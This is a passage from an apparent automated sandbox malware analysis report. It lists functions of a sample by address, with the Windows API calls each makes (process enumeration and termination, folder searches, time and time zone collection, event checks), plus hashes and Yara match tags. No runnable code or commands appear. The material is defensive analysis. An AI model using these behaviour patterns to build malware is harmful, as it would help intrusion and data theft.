                                                  • Instruction ID: aac9a9dda8b6bffb01e0c1a451cc2f3f7701d7e877d90579389f83d969e33881
                                                  • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                  • Instruction Fuzzy Hash: C8311775E01248AFDB14DFE0CC58BEDB779EF44740F904459E606AA184DBB4AA84CF51
                                                  Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004194EB
                                                    • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                    • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                    • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                  • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                  • String ID:
                                                  • API String ID: 396451647-0
                                                  • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                  • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                  • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                  • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                  Function 02F188E7 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 02F18931
                                                  • Process32First.KERNEL32(?,00000128), ref: 02F18945
                                                  • Process32Next.KERNEL32(?,00000128), ref: 02F1895A
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • CloseHandle.KERNEL32(?), ref: 02F189C8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 1066202413-0
                                                  • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                  • Instruction ID: 675dac7974bd38512efb1da8af9bdae2006f61f1807d08f29e9315cd4921ab26
                                                  • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                  • Instruction Fuzzy Hash: AF316071A42218EBCB24DF94DD54FEEB779EF45740F904199E20AA21A0EB346F84CF91
                                                  Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                  • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                  • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • CloseHandle.KERNEL32(?), ref: 00418761
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 1066202413-0
                                                  • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                  • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                  • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                  • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                  Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                  • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                  • lstrcatA.KERNEL32(?,02D45960), ref: 00414FAB
                                                  • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                  • String ID:
                                                  • API String ID: 2667927680-0
                                                  • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                  • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                  • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                  • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                  Function 004187C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                  • wsprintfA.USER32 ref: 00418850
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                                  • String ID: %dx%d
                                                  • API String ID: 2716131235-2206825331
                                                  • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                  • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                  • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                  • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                  Function 02F11A07 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcessstrtok_s
                                                  • String ID:
                                                  • API String ID: 3407564107-0
                                                  • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                  • Instruction ID: cf5dcde924e8ad33d7a538400bef30071ddb9affd60e0b4c8d9e96fcbe7961c9
                                                  • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                  • Instruction Fuzzy Hash: 0C1149B4901209EFCB04DFE4D948AEEBB75FF04345F408469EA0A66290E7305B04CF65
                                                  Function 02F17BE7 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 02F17C17
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F17C1E
                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 02F17C2B
                                                  • wsprintfA.USER32 ref: 02F17C5A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                  • String ID:
                                                  • API String ID: 377395780-0
                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction ID: 647a98b0d09f70e1b24499a55e8a1354f16ac3998a0188822fbf3bcf93acbbc3
                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction Fuzzy Hash: 321139B2944118ABCB14DFCADD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1
                                                  Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                  • wsprintfA.USER32 ref: 004179F3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                  • String ID:
                                                  • API String ID: 1243822799-0
                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                  Function 02F17C97 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 02F17CCA
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F17CD1
                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 02F17CE4
                                                  • wsprintfA.USER32 ref: 02F17D1E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                  • String ID:
                                                  • API String ID: 3317088062-0
                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction ID: d6703289cda73153ae8f9d7f8b34de461a58e98374c36994d2f2c6e8bf7ed864
                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction Fuzzy Hash: 54115EB1A45218EFEB209B54DC49FA9B7B8FB05761F10439AE61AA32C0C7745940CF51
                                                  Function 02F13880 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s
                                                  • String ID:
                                                  • API String ID: 3330995566-0
                                                  • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                  • Instruction ID: cf293a326e55f7e274afc51a346540a0ad323369d8e653759d3f9fb9c744fe1f
                                                  • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                  • Instruction Fuzzy Hash: CD1157B1E00209EFDB14CFE6E898BEEBBB5FB08345F40C029E125A6254D7749500CF55
                                                  Function 02F19547 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNEL32(02F13D55,80000000,00000003,00000000,00000003,00000080,00000000,?,02F13D55,?), ref: 02F19563
                                                  • GetFileSizeEx.KERNEL32(000000FF,02F13D55), ref: 02F19580
                                                  • CloseHandle.KERNEL32(000000FF), ref: 02F1958E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSize
                                                  • String ID:
                                                  • API String ID: 1378416451-0
                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction ID: ec6aacdba406f616a21ac93e5f73588477a47b7870623076af2d1001691d63c0
                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction Fuzzy Hash: 10F04F3AF40208BBDB20DFF0DC59B9E77FAEB49750F50C654FA11A7280D67596018B81
                                                  Function 02F16D5A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02F16D31
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F16D4F
                                                  • CloseHandle.KERNEL32(00000000), ref: 02F16D60
                                                  • Sleep.KERNEL32(00001770), ref: 02F16D6B
                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02F16D81
                                                  • ExitProcess.KERNEL32 ref: 02F16D89
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                  • String ID:
                                                  • API String ID: 941982115-0
                                                  • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                  • Instruction ID: abdb566436e8594fa85b81c775b942bbf850f1edb327f4f1204cabb594768ff7
                                                  • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                  • Instruction Fuzzy Hash: 34F05E78A44605AEE710EBE1DC09BBD767AEF05785F911618F703E5190CFB04100CA56
                                                  Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `o@
                                                  • API String ID: 0-590292170
                                                  • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                  • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                  • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                  • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                  Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimelstrcpy
                                                  • String ID: cI@$cI@
                                                  • API String ID: 62757014-1697673767
                                                  • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                  • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                  • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                  • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                  Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                  • lstrcatA.KERNEL32(?,02D49638), ref: 004150A8
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                  • String ID: aA
                                                  • API String ID: 2699682494-2567749500
                                                  • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                  • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                  • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                  • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                  Function 02F0BCE7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02F0A094
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0BF06
                                                    • Part of subcall function 02F19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02F190B9
                                                  • StrStrA.SHLWAPI(00000000,004213E0), ref: 02F0BF34
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0C00C
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0C020
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                  • String ID:
                                                  • API String ID: 1440504306-0
                                                  • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                  • Instruction ID: 6ca5659974851c643bd76181d5519c209608e2acf8e1c8d359108493bc00d145
                                                  • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                  • Instruction Fuzzy Hash: 8DB12F72911218EBCB18FBA0DD95EEEB73AAF54744F80415DE606A3090EF346B48CF61
                                                  Function 00413BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
